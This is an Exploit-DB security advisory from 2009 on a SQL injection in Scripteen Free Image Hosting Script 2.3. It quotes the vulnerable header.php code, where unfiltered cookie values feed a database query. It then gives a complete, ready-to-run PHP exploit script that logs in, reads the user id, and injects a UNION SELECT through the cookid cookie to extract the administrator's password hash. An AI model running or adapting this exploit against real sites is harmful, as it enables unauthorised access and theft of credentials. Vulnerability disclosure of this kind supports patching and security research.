Scripteen Free Image Hosting Script 2.3 - SQL Injection

EDB-ID:

9252


Author:

Coksnuss

Type:

webapps


Platform:

PHP

Date:

2009-07-24


===================
Scripteen Free Image Hosting Script v2.3 SQL Injection vulnerable
===================

The vulnerable: header.php (line 53-62)

	$userid=$_SESSION['userid'];
	$usergid=$_SESSION['usergid'];
	if (!$userid || empty($userid) || $userid==""){
    		$userid = $_COOKIE['cookid'];
	}
	if (!$usergid || empty($usergid) || $usergid==""){
    		$usergid = $_COOKIE['cookgid'];
	}

As you can see $_COOKIE['cookid'] and $_COOKIE['cookgid'] is not filtered and can be used to do an SQL Injection

===================
Proof of concept
===================
<?php
// *************************************
// Global variables
// *************************************
$g_arguments	= getArguments();
$g_url		= isset($g_arguments['url']) ? $g_arguments['url'] : false;
$g_username	= isset($g_arguments['username']) ? $g_arguments['username'] : false;
$g_password	= isset($g_arguments['password']) ? $g_arguments['password'] : false;
// *************************************

// *************************************
// Print help
// *************************************
if(isset($g_arguments['help']) || $g_url === false || $g_username === false || $g_password === false)
{
	echo "###################################\n";
	echo "#                                  \n";
	echo "# Scripteen Free Image Hosting V2.3\n";
	echo "#      SQL Injection Exploit       \n";
	echo "#      Discovered by Coksnuss      \n";
	echo "#      POC script by Coksnuss      \n";
	echo "#                                  \n";
	echo "###################################\n";
	
	echo "Usage: " . $argv[0] . "\n";
	echo "\t--help - This help\n";
	echo "\t--url=[STR] - URL of a vulnerable site (e.g. http://www.host.de/path/to/script)\n";
	echo "\t--username=[STR] - A valid username to login\n";
	echo "\t--password=[STR] - A valid password to login\n";
	die();
}
// *************************************


// *************************************
// Main
// *************************************
$url = strpos($g_url, '.php') !== false ? dirname($g_url) : $g_url;
if(substr($url, -1, 1) == '/' ) $url = substr($url, 0, -1);

// Get Cookie
echo "Generate cookie...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,		$g_url . '/login.php');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_COOKIEJAR,	dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_POST,	true);
curl_setopt($curl, CURLOPT_POSTFIELDS,	'uname=' . urlencode($g_username) . '&pass=' . urlencode($g_password));

$ret = curl_exec($curl);
curl_close($curl);

preg_match_all('/([\d]{1}[.][\d]{1})/', $ret, $matches);
if(!array_search('2.3', $matches[1]))
	echo("\nWarning: It seems like this site do not use version 2.3 of the Scripteen Free Image Hosting Script!\n");

if(!file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt'))
	die('Be sure that you\'ve enabled CURL and have write permission in the script directory!');

echo "DONE\n";

// Get userid
echo "Get userid...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,		$g_url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIEFILE,	dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$ret = curl_exec($curl);
curl_close($curl);

if(!preg_match('/<input type="hidden" name="userid" id="userid" value="([\d]{1,3})"/', $ret, $match))
	die('Couldn\'t retrieve userid! Check your login data again!');

$userid = $match[1];
echo "DONE (" . $userid . ")\n";

// Get the password hash from userid 1
echo "Get the passwordhash from userid 1...\n";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,		$g_url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIE,	'cookid=' . $userid . ' UNION SELECT 1,2,password,4,5,6,7,8,9,10,11 FROM users WHERE userid=1; cookgid=3; cookname=' . urlencode($g_username) . '; cookpass=' . md5($g_password));
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$ret = curl_exec($curl);
curl_close($curl);

if(!preg_match('/<input type="text" name="uname" id="uname" value="([a-z0-9]{32})"/', $ret, $match))
	die('Couldn\'t find the password hash!');

echo "Hash found: " . $match[1] . "\n";
// *************************************


// *************************************
// Global functions
// *************************************
function getArguments()
{
	global $argv;
	
	foreach($argv as $arg)
	{
		if(substr($arg, 0, 2) == '--')
		{
			// In case its an arguments (e.g. --arg='1')
			if(($pos = strpos($arg, '=')) !== false)
			{
				$name = substr($arg, 2, ($pos - 2));
				$value = substr($arg, ($pos + 1));
				
				$args[$name] = $value;
			// Or just a flag (e.g. --help)
			} else {
				$name = substr($arg, 2);
				
				$args[$name] = true;
			}
		} else if($arg == $argv[0]) {
			$args[0] = $argv[0];
		}
	}
	
	return $args;
}
// *************************************
?>

# milw0rm.com [2009-07-24]